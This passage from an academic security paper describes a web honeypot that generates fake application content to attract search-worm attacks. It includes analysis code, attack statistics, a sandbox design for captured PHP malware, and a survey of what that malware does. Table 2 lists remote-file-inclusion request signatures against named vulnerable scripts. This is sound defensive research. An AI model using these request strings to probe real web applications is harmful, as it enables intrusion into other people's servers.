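        "attacks": total,
        "unique_scripts": len(scripts),
        "unique_php_attacks": len(php_attacks),
        "botnets": len(botnet_ips),
        "unique_ips": len(ips),
        "botnet_ips": {repo: sorted(v) for repo, v in botnet_ips.items()},
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_LOG).items():
        print(key, value)
```

Grouping by repository host inherits the looseness the text acknowledges: two botnets sharing one hosting site collapse into one, and one botnet rotating sites is counted several times.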

The results are shown in Figure 7. An immediate observation is the sheer volume of attacks—in total, well over 368,000 attacks targeting just under 45,000 unique scripts before we shut down the responder. Interestingly, notice that there are more unique PHP attacks than unique IPs, suggesting that unlike traditional scanning attacks, these bots query for and attack a wide variety of web applications. Moreover, while many bots attempt to exploit a large number of vulnerabilities, the repositories hosting the injected scripts remain unchanged from attack to attack. The range of attacks is perhaps better demonstrated not by the number of unique PHP scripts attacked but by the number of unique PHP web-applications that are the target of these attacks.

6.1.1 Unique WebApps

In general, classifying the number of unique web applications being attacked is difficult because some bots target PHP scripts whose filenames are ubiquitous (e.g., index.php). In these cases, bots are either targeting a vulnerability in one specific web-application that happens to use a common filename or arbitrarily attempting to include remote PHP scripts.

To determine if an attack can be linked to a specific web-application, we downloaded the directory structures for over 4,000 web-applications from SourceForge.net. From these directory structures, we matched the web application to the corresponding attacked script (e.g., gallery.php might appear only in the Web Gallery web application). Next, we associated an attack with a specific web application if the file name appeared in no more than 10 web-app file structures. We choose a threshold of 10 since SourceForge stores several copies of essentially the same web application under different names (due to, for instance, “skin” changes or different code maintainers). For non-experimental deployments aimed at detecting zero-day attacks, training data could be associated with its application of origin, thereby making associations between non-generic attacks and specific web-applications straightforward.

Based on this heuristic, we are able to map the 24,000 flows we initially trained on to 560 “unique” web-applications. Said another way, by simply building our language models on randomly chosen flows, we were able to generate content that approximates 560 distinct web-applications — a feat that is not as easy to achieve if we were to deploy each application on a typical web-based honeypot (e.g., the Google Hack Honeypot [3]). The attacks themselves were linked back to 295 distinct web applications, which is indicative of the diversity of attacks.

We note that our heuristic to map content to web-apps is strictly a lower bound as it only identifies web-applications that have a distinct directory structure and/or file name; a large percentage of web-applications use index.php and other ubiquitous names and are therefore not accounted for. Nonetheless, we believe this serves to make the point that our approach is effective and easily deployable, and moreover, provides insight into the amount of web-application vulnerabilities currently being leveraged by botnets.
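The file-name heuristic of this section, and why it yields only a lower bound, can be seen in the following added example (not the authors' code). The application trees are constructed, and matching on the longest path suffix rather than on the bare file name is an assumption made so that directory structure counts too.

```python
from collections import defaultdict

# Constructed directory listings standing in for downloaded application trees.
SAMPLE_TREES = {
    "photo-album": ["albums/view_album.php", "index.php", "includes/config.php"],
    # A re-skinned copy of the same application under another project name.
    "photo-album-blue-skin": ["albums/view_album.php", "index.php", "includes/config.php"],
    "tiny-wiki": ["wiki/render_page.php", "index.php"],
}
# Ten unrelated applications that only have ubiquitous file names.
SAMPLE_TREES.update(
    {f"generic-app-{i}": ["index.php", "includes/config.php"] for i in range(10)}
)


def path_suffixes(path):
    """'/a/b/c.php' -> ['a/b/c.php', 'b/c.php', 'c.php'], longest first.
    Matching is case-insensitive (an assumption of this sketch)."""
    parts = [p for p in path.lower().split("/") if p]
    return ["/".join(parts[i:]) for i in range(len(parts))]


def build_index(app_trees):
    """Map every path suffix to the set of applications that contain it."""
    index = defaultdict(set)
    for app, files in app_trees.items():
        for file_path in files:
            for suffix in path_suffixes(file_path):
                index[suffix].add(app)
    return index


def attribute(script_path, index, threshold=10):
    """Return the candidate applications for an attacked script, or [] when
    the script is unknown or appears in more than `threshold` applications."""
    for suffix in path_suffixes(script_path):
        apps = index.get(suffix)
        # The longest known suffix is the most specific evidence available;
        # shorter suffixes can only match the same or more applications.
        if apps and len(apps) <= threshold:
            return sorted(apps)
    return []


def attribute_attacks(script_paths, index, threshold=10):
    """Split attacked scripts into attributed ones and the unattributed rest."""
    attributed, unattributed = {}, []
    for path in sorted(set(script_paths)):
        apps = attribute(path, index, threshold)
        if apps:
            attributed[path] = apps
        else:
            unattributed.append(path)
    return attributed, unattributed


if __name__ == "__main__":
    idx = build_index(SAMPLE_TREES)
    attacked = ["/~user/photos/albums/view_album.php", "/index.php",
                "/wiki/render_page.php", "/site/includes/config.php"]
    print(attribute_attacks(attacked, idx))
```

The re-skinned copy shows why the threshold is greater than one, and the unattributed `index.php` and `includes/config.php` requests are the attacks the lower bound leaves out.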

6.1.2 Spotting Emergent Threats

While the original intention of our deployment was to elicit interaction from malware exploiting known vulnerabilities in web applications, we became indexed under broader conditions due to the high amount of variability in our training data. As a result, a honeypot or active responder indexed under such a broad set of web applications can, in fact, attract attacks targeting unknown vulnerabilities. For instance, according to milw0rm (a popular security advisory/exploit distribution site), over 65 PHP remote inclusion vulnerabilities were released during our two month deployment [1]. Our deployment began on October 27th, 2007 and used the same training data for its entire duration. Hence, any attack exploiting a vulnerability released after October 27th is an attack we did not explicitly set out to detect.

Nonetheless, we witnessed several emergent threats (some may even consider them “zero-day” attacks) because some of the original queries used to bootstrap training were generic and happened to represent a wide number of webapps. As of this writing, we have identified more than 10 attacks against vulnerabilities that were undisclosed at deployment time (some examples are illustrated in Table 2). It is unlikely that we witnessed these attacks simply because of arbitrary attempts to exploit random websites—indeed, we never witnessed many of the other disclosed vulnerabilities being attacked.

We argue that given the frequency with which these types of vulnerabilities are released, a honeypot or an active responder without dynamic content generation will likely miss an overwhelming amount of attack traffic—in the attacks we witnessed, botnets begin attacking vulnerable applications on the day the vulnerability was publicly disclosed! An even more compelling case for our architecture is embodied by attacks against vulnerabilities that have not been disclosed (e.g., the recent WordPress vulnerability [7]). We believe that the potential to identify these attacks exemplifies the real promise of our approach.

6.2 Dissecting the Captured Payloads

To better understand what the post-infection process entails, we conducted a rudimentary analysis of the remotely included PHP scripts. Our malware analysis was performed on a Linux based Intel virtual machine with the 2.4.7 kernel. We used a deprecated kernel version since newer versions do not export the system call table of which we take advantage. Our environment consisted of a kernel module and a preloaded library⁷ that serve to inoculate malware before execution and to log interesting behavior. The preloaded library captures calls to connect() and send(). The connect hook deceives the malware by faking successful connections, and the send function allows us to record information transmitted over sockets.⁸

Disclosure Date   Attack Date   Signature
2007-11-04        2007-11-10    /starnet/themes/c-sky/main.inc.php?cmsdir=
2007-11-21        2007-11-23    /comments-display-tpl.php?language_file=
2007-11-22        2007-11-22    /admin/kfm/initialise.php?kfm_base_path=
2007-11-25        2007-11-25    /Commence/includes/db_connect.php?phproot_path=
2007-11-28        2007-11-28    /decoder/gallery.php?ccms_library_path=

Table 2: Attacks targeting vulnerabilities that were unknown at time of deployment

Our kernel module hooks three system calls (open, write, and execve). We execute every script under a predefined user ID, and interactions under this ID are recorded via the open() hook. We also disallow calls to open that request write access to a file, but feign success by returning a special file descriptor. Attempts to write to this file descriptor are logged via syslog. Doing so allows us to record files written by the malware without allowing it to actually modify the file system. Similarly, only commands whose file names contain a pre-defined random password are allowed to execute. All other command executions under the user ID fail to execute (but pretend to succeed), assuring no malicious commands execute. Returning success from failed executions is important because a script may, for example, check if a command (e.g., wget) successfully executes before requesting the target URL.

To determine the functionality of the individual malware scripts, we batch processed all the captured malware on the aforementioned architecture. From the transcripts provided by the kernel module and library, we were able to discern basic functionality, such as whether or not the script makes connections, issues IRC commands, attempts to write files, etc. In certain cases, we also conducted more in-depth analyses by hand to uncover seemingly more complex functionality. We discuss our findings in more detail below.

The high-level breakdown for the observed scripts is given in Table 3. The challenge in capturing bot payloads in web application attacks stems from the ease with which the attacker can test for a vulnerability; unique string displays (where the malware echoes a unique token in the response to signify successful exploitation) account for the most prevalent type of injection. Typically, bots parse returned responses for their identifying token and, if found, proceed to inject the actual bot payload. Since these unique tokens are unlikely to appear in our generated response, we augment our responder to echo these tokens at run-time. While the use of random numbers as tokens seems to be the soup du jour for testing a vulnerability, we observed several instances where attackers injected an image. Somewhat comically, in many cases, the bot simply e-mails the IP address of the vulnerable machine, which the attacker then attempts to exploit at a later time. The least common vulnerability test we observed used a connect-back operation to connect to an attacker-controlled system and send vulnerability information to the attacker. This information is presumably logged server-side for later use.

Script Classification    Instances
PHP Web-based Shells     834
Echo Notification        591
PHP Bots                 377
Spammers                 347
Downloaders              182
Perl Bots                136
Email Notification       87
Text Injection           35
Java-script Injection    18
Information Farming      9
Uploaders                4
Image Injection          4
UDP Flooders             3

Table 3: Observed instances of individual malware

Interestingly, we notice that bots will often inject simple text files that typically also contain a unique identifying string. Because PHP scripts can be embedded inside HTML, PHP requires begin and end markers. When a text file is injected without these markers, its contents are simply interpreted as HTML and displayed in the output. This by itself is not particularly interesting, but we observed several attackers injecting large lists of queries to find vulnerable web applications via search engines. The largest query list we captured contained 7,890 search queries that appear to identify vulnerable web applications — all of which could be used to bootstrap our content generation further and cast an even wider net.

Overall, the collected malware was surprisingly modular and offered diverse functionality similar to that reported elsewhere [26, 15, 13, 12, 25, 5, 4]. The captured scripts (mostly PHP-based command shells) are advanced enough that many have the ability to display the output in some user-friendly graphical user interface, obfuscate the script itself, clean the logs, erase the script and related evidence, deface a site, crawl vulnerability sites, perform distributed denial of service attacks and even perform automatic self-updates. In some cases, the malware inserted tracking cookies and/or attempted to gain more information about a system’s inner-workings (e.g., by copying /etc/passwd and performing local banner scans). To our surprise, only eight scripts contained functionality to automatically obtain root. In these cases, they all used C-based kernel vulnerabilities that write to the disk and compile upon exploitation. Lastly, IRC was used almost exclusively as the communication medium. As can be expected, we also observed several instances of spamming malware using e-mail addresses pulled from the web-application’s MySQL database backend. In a system like phpBB, this can be highly effective because most forum users enter an e-mail address during the registration process. Cross-checking the bot IPs with data from the Spamhaus project [2] shows that roughly 36% of them currently appear in the spam black list.

One noteworthy functionality that seems to transcend our categorizations among PHP scripts is the ability to break out of PHP safe mode. PHP safe mode disables functionality for, among others, executing system commands, modifying the file system, etc. The malware we observed that bypasses safe mode tends to contain a handful of known exploits that either exploit functionality in PHP, functionality in mysql, or functionality in web server software. Lastly, we note that although we observed what appeared to be over 5,648 unique injection scripts from distinct botnets, nearly half of them point to zombie botnets. These botnets no longer have a centralized control mechanism and the remotely included scripts are no longer accessible. However, they are still responsible for an overwhelming amount of our observed HTTP traffic.

6.3 Limitations

One might argue that a considerably less complex (but more mundane) approach for eliciting search worm traffic may be to generate large static pages that contain content representative of a variety of popular web-applications. However, simply returning arbitrary or static pages does not yield either the volume or diversity of attacks we observed. For instance, one of our departmental websites (with a much higher PageRank than our deployment site) only witnessed 437 similar attacks since August 2006. As we showed in Section 6, we witnessed well over 368,000 attacks in just over two months. Moreover, close inspection of the attacks on the university website shows that they are far less varied or interesting. These attacks seem to originate from either a few botnets that issue “loose” search queries (e.g., “inurl:index.php”) and subsequently inject their attack, or simply attack ubiquitous file names with common variable names. Not surprisingly, these unsophisticated botnets are less widespread, most likely because they fail to infect many hosts. By contrast, the success of our approach led to more insightful observations about the scope and diversity of attacks because we were able to cast a far wider net.

That said, for real-world honeypot deployments, detection and exploitation of the honeypot itself can be a concern. Clearly, our system is not a true web-server and like other honeypots [23], it too can be trivially detected using various fingerprinting techniques [14]. More to the point, a well-crafted bot that knows that a particular string always appears in pages returned by a given web-application could simply request the page from us and check for the presence of that string. Since we will likely fail to produce that string, our phony will be detected.⁹

The fact that our web-honeypot can be detected is a clear limitation of our approach, but in practice it has not hindered our efforts to characterize current attack trends, for several reasons. First, the search worms we witnessed all seemed to use search engines to find the identifying information of a web-application, and attacked the vulnerability upon the first visit to the site; presumably because verifying that the response contains the expected string slows down infection. Moreover, it is often times difficult to discern the web-application of origin as many web-applications do not necessarily contain strings that uniquely identify the software. Indeed, in our own analysis, we often had difficulty identifying the targeted web-application by hand, and so automating this might not be trivial.

Lastly, we argue that the limitations of the approach proposed herein manifest themselves as trade-offs. Our decision to design a stateless system results in a memory-efficient and lightweight deployment. However, this design choice also makes handling stateful protocols nearly impossible. It is conceivable that one can convert our architecture to better interact with stateful protocols by simply changing some aspects of the design. For instance, this could be accomplished by incorporating flow sequence information into training and then recalling its hierarchy during generation (e.g., by generating a response from the set of appropriate first round responses, then second round responses, etc.). To capture multi-stage attacks, however, ScriptGen [18, 17] may be a better choice for emulating multi-stage protocol interaction, and can be used in conjunction with our technique to cast a wider net to initially entice such malware.


7 Conclusion

In this paper, we use a number of multi-disciplinary techniques to generate dynamic responses to protocol interactions. We demonstrate the utility of our approach through the deployment of a dynamic content generation system targeted at eliciting attacks against web-based exploits. During a two month period we witnessed an unrelenting barrage of attacks from attackers that scour search engine results to find victims (in this case, vulnerable web applications). The attacks were targeted at a diverse set of web applications, and employed a myriad of injection techniques. We believe that the results herein provide valuable insights on the nature and scope of this increasing Internet threat.

8 Acknowledgments

We thank Ryan MacArthur for his assistance with the forensic analysis presented in Section 6.2. We are grateful to him for the time spent analyzing and cataloging the captured payloads. We also thank David Dagon for cross-referencing bot IP addresses with the Spamhaus Project black lists [2]. We extend our gratitude to our shepherd, George Danezis, and the anonymous reviewers for their invaluable comments and suggestions. We also thank Bryan Hoffman, Charles Wright, Greg MacManus, Moheeb Abu Rajab, Lucas Ballard, and Scott Coull for many insightful discussions during the course of this project. This work was funded in part by NSF grants CT-0627476 and CNS-0546350.

Data Availability

To promote further research and awareness of the malware problem, the data gathered during our live deployment is available to the research community. For information on how to get access to this data, please see http://spar.isi.jhu.edu/botnet_data/.

References

[1] Milw0rm. See http://www.milw0rm.com/.

[2] The Spamhaus Project. See http://www.spamhaus.org/.

[3] The Google Hack Honeypot, 2005. See http://ghh.sourceforge.net/.

[4] ANDERSON, D. S., FLEIZACH, C., SAVAGE, S., AND VOELKER, G. M. Spamscatter: Characterizing internet scam hosting infrastructure. In Proceedings of the 16th USENIX Security Symposium, pp. 135–148.

[5] BARFORD, P., AND YEGNESWARAN, V. An inside look at botnets. In Advances in Information Security (2007), vol. 27, Springer Verlag, pp. 171–191.

[6] BEDDOE, M. The protocol informatics project, 2004.

[7] CHEUNG, A. Secunia’s wordpress GBK/Big5 character set "S" SQL injection advisory. See http://secunia.com/advisories/28005/.

[8] CUI, W., KANNAN, J., AND WANG, H. J. Discoverer: Automatic protocol reverse engineering from network traces. In Proceedings of the 16th USENIX Security Symposium (Boston, MA, August 2007), pp. 199–212.

[9] CUI, W., PAXSON, V., WEAVER, N., AND KATZ, R. H. Protocol-independent adaptive replay of application dialog. In Network and Distributed System Security Symposium 2006 (February 2006), Internet Society.

[10] CUI, W., PAXSON, V., AND WEAVER, N. C. GQ: Realizing a system to catch worms in a quarter million places. Tech. Rep. TR-06-004, International Computer Science Institute, 2006.

[11] DUNLAP, G. W., KING, S. T., CINAR, S., BASRAI, M. A., AND CHEN, P. M. Revirt: enabling intrusion analysis through virtual-machine logging and replay. In Proceedings of the 5th symposium on Operating systems design and implementation (New York, NY, USA, 2002), ACM Press, pp. 211–224.

[12] FREILING, F. C., HOLZ, T., AND WICHERSKI, G. Botnet tracking: Exploring a root-cause methodology to prevent distributed denial-of-service attacks. In Proceedings of the 10th European Symposium on Research in Computer Security (ESORICS) (September 2005), vol. 3679 of Lecture Notes in Computer Science, pp. 319–335.

[13] GU, G., PORRAS, P., YEGNESWARAN, V., FONG, M., AND LEE, W. BotHunter: Detecting malware infection through IDS-driven dialog correlation. In Proceedings of the 16th USENIX Security Symposium (August 2007), pp. 167–182.

[14] HOLZ, T., AND RAYNAL, F. Detecting honeypots and other suspicious environments. In Proceedings of the Workshop on Information Assurance and Security (June 2005).


[15] Know your enemy: Tracking botnets. Tech. rep., The Honeynet Project and Research Alliance, March 2005. Available from http://www.honeynet.org/papers/bots/.

[16] KREIBICH, C., AND CROWCROFT, J. Honeycomb - Creating Intrusion Detection Signatures Using Honeypots. In Proceedings of the Second Workshop on Hot Topics in Networks (Hotnets II) (Boston, November 2003).

[17] LEITA, C., DACIER, M., AND MASSICOTTE, F. Automatic handling of protocol dependencies and reaction to 0-day attacks with ScriptGen based honeypots. In RAID (2006), D. Zamboni and C. Krugel, Eds., vol. 4219 of Lecture Notes in Computer Science, Springer, pp. 185–205.

[18] LEITA, C., MERMOUD, K., AND DACIER, M. ScriptGen: an automated script generation tool for honeyd. In Proceedings of the 21st Annual Computer Security Applications Conference (December 2005), pp. 203–214.

[19] NEEDLEMAN, S. B., AND WUNSCH, C. D. A general method applicable to the search for similarities in the amino acid sequence of two proteins. Journal of Molecular Biology, 48 (1970), 443–453.

[20] NEWSOME, J., KARP, B., AND SONG, D. Polygraph: Automatically generating signatures for polymorphic worms. In Proceedings of the 2005 IEEE Symposium on Security and Privacy (Washington, DC, USA, 2005), IEEE Computer Society, pp. 226–241.

[21] NEWSOME, J., AND SONG, D. Dynamic taint analysis for automatic detection, analysis, and signature generation of exploits on commodity software. In Proceedings of the Network and Distributed System Security Symposium (2005).

[22] PANG, R., YEGNESWARAN, V., BARFORD, P., PAXSON, V., AND PETERSON, L. Characteristics of Internet background radiation, October 2004.

[23] PROVOS, N. A virtual honeypot framework. In Proceedings of the 12th USENIX Security Symposium (August 2004), pp. 1–14.

[24] PROVOS, N., MCCLAIN, J., AND WANG, K. Search worms. In Proceedings of the 4th ACM workshop on Recurring malcode (New York, NY, USA, 2006), ACM, pp. 1–8.

[25] PROVOS, N., MCNAMEE, D., MAVROMMATIS, P., WANG, K., AND MODADUGU, N. The ghost in the browser: Analysis of web-based malware. In Usenix Workshop on Hot Topics in Botnets (HotBots) (2007).

[26] RAJAB, M. A., ZARFOSS, J., MONROSE, F., AND TERZIS, A. A multifaceted approach to understanding the botnet phenomenon. In Proceedings of ACM SIGCOMM/USENIX Internet Measurement Conference (October 2006), ACM, pp. 41–52.

[27] RAJAB, M. A., ZARFOSS, J., MONROSE, F., AND TERZIS, A. My botnet is bigger than yours (maybe, better than yours): Why size estimates remain challenging. In Proceedings of the first USENIX workshop on hot topics in Botnets (HotBots ’07) (April 2007).

[28] RIDEN, J., MCGEEHAN, R., ENGERT, B., AND MUETER, M. Know your enemy: Web application threats, February 2007.

[29] TATA, S., AND PATEL, J. Estimating the selectivity of TF-IDF based cosine similarity predicates. SIGMOD Record 36, 2 (June 2007).

[30] WITTEN, I. H., AND BELL, T. C. The zero-frequency problem: Estimating the probabilities of novel events in adaptive text compression. IEEE Transactions on Information Theory 37, 4 (1991), 1085–1094.

[31] YEGNESWARAN, V., GIFFIN, J. T., BARFORD, P., AND JHA, S. An Architecture for Generating Semantics-Aware Signatures. In Proceedings of the 14th USENIX Security Symposium (Baltimore, MD, USA, Aug. 2005), pp. 97–112.

Notes

1 The drawback, of course, is that high-interaction honeypots are a heavy-weight solution, and risk creating their own security problems [23].

2 Protocol messages are tokenized similarly in [18, 17] and [8].

3 In practice, we use printable and non-printable.

4 The results are virtually the same for nslookup, and hence, omitted.

5 These initial queries were provided by one of the authors, but similar results could easily be achieved by crawling the WebApp directories in SourceForge and searching Google for identifiable strings (similar to what we outline in Section 6.1.1).

6 We placed links on 3 pages with Google PageRank ranking of 6, 2 pages with rank 5, 3 pages with rank 2, and 5 pages with rank 0.

7 A preloaded library loads before all other libraries in order to hook certain library functions.

8 Because none of the malware we obtained use direct system calls to either connect() or send(), this setup suffices for our needs.

9 Notice however that if a botnet has n bots conducting an attack against a particular web-application, we only need to probabilistically return what the malware is seeking 1/nth of the time to capture the malicious payload.